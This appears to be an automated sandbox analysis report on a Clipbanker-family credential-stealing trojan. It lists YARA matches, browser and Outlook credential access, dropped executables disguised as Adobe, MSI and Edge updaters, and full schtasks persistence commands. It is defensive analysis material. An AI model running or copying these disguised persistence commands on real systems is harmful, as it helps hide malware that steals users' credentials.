Source: 00000009.00000002.2211800433.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000007.00000002.2220685526.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000007.00000002.2220685526.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000008.00000002.2218340799.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000008.00000002.2218340799.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000E.00000002.4441908172.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000E.00000002.4441908172.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000012.00000002.2379291934.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000012.00000002.2379291934.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@24/32@5/4

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_06D29130 CreateToolhelp32Snapshot,Process32First,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,

0_2_06D29130

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\signons.sqlite

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4500:120:WilError_03
Source: C:\Users\user\Desktop\file.exe	Mutant created: \Sessions\1\BaseNamedObjects\slickSlideAnd2
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5068:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe	Mutant created: \Sessions\1\BaseNamedObjects\jW5fQ5e-C7lR7tC1q
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6756:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4748:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\trixy1UB98D2D2zeo

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000002.4442200408.000000000030D000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000003.2113965338.000000000647E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.000000000647E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE autofill (name VARCHAR, value VARCHAR, value_lower VARCHAR, da`;H
Source: file.exe, 00000000.00000002.4442200408.000000000030D000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000003.2122632450.0000000006540000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124050663.000000000173B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2112112086.0000000006483000.00000004.00000020.00020000.00000000.sdmp, HYMDMNDHbpvCLogin Data.0.dr, yDHoBcv6VALYLogin Data For Account.0.dr, KNCS9xAjcy97Login Data.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
Source: unknown	Process created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe "C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe"
Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe "C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe "C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe"			Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: d3d11.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dxgi.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: resourcepolicyclient.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: d3d10warp.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dxcore.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: devobj.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vaultcli.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windowscodecs.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: linkinfo.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntshrui.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cscapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: d2d1.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll			Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe	Section loaded: apphelp.dll			Jump to behavior

Source: EdgeMS2.lnk.0.dr

LNK file: ..\..\..\..\..\..\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: file.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: file.exe

Static file information: File size 8778752 > 1048576

Source: file.exe

Static PE information: Raw size of .vmpY[. is bigger than: 0x100000 < 0x838200

Data Obfuscation

Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe	Unpacked PE file: 7.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe	Unpacked PE file: 8.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe	Unpacked PE file: 9.2.llmcrdwzLnNKYB4T0Vnw.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe	Unpacked PE file: 14.2.oobeldr.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe	Unpacked PE file: 17.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe	Unpacked PE file: 18.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe	Unpacked PE file: 19.2.EdgeMS2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_06D4C990 SetThreadExecutionState,SetThreadExecutionState,GetVersion,GetCurrentThreadId,GetThreadDesktop,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GdiplusStartup,CreateThread,CloseHandle,

0_2_06D4C990

Source: initial sample

Static PE information: section where entry point is pointing to: .vmpY[.

Source: file.exe	Static PE information: section name: .vmp#+
Source: file.exe	Static PE information: section name: .vmp#+
Source: file.exe	Static PE information: section name: .vmp#+
Source: file.exe	Static PE information: section name: .vmpY[.
Source: file.exe	Static PE information: section name: .vmpY[.
Source: l2[1].exe.0.dr	Static PE information: section name: .MPRESS1
Source: l2[1].exe.0.dr	Static PE information: section name: .MPRESS2
Source: llmcrdwzLnNKYB4T0Vnw.exe.0.dr	Static PE information: section name: .MPRESS1
Source: llmcrdwzLnNKYB4T0Vnw.exe.0.dr	Static PE information: section name: .MPRESS2
Source: AdobeUpdaterV2.exe.0.dr	Static PE information: section name: .MPRESS1
Source: AdobeUpdaterV2.exe.0.dr	Static PE information: section name: .MPRESS2
Source: MSIUpdaterV2.exe.0.dr	Static PE information: section name: .MPRESS1
Source: MSIUpdaterV2.exe.0.dr	Static PE information: section name: .MPRESS2
Source: EdgeMS2.exe.0.dr	Static PE information: section name: .MPRESS1
Source: EdgeMS2.exe.0.dr	Static PE information: section name: .MPRESS2
Source: oobeldr.exe.9.dr	Static PE information: section name: .MPRESS1
Source: oobeldr.exe.9.dr	Static PE information: section name: .MPRESS2

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D8C245 push esi; ret		0_2_06D8C24E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D8CE63 push es; iretd		0_2_06D8CE64
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D68F27 push es; ret		0_2_06D68F45
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D65B83 push ecx; ret		0_2_06D65B96
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe	Code function: 7_2_006D50A5 push ebp; ret		7_2_00721C57

Persistence and Installation Behavior

Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe (copy)
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe			Jump to dropped file
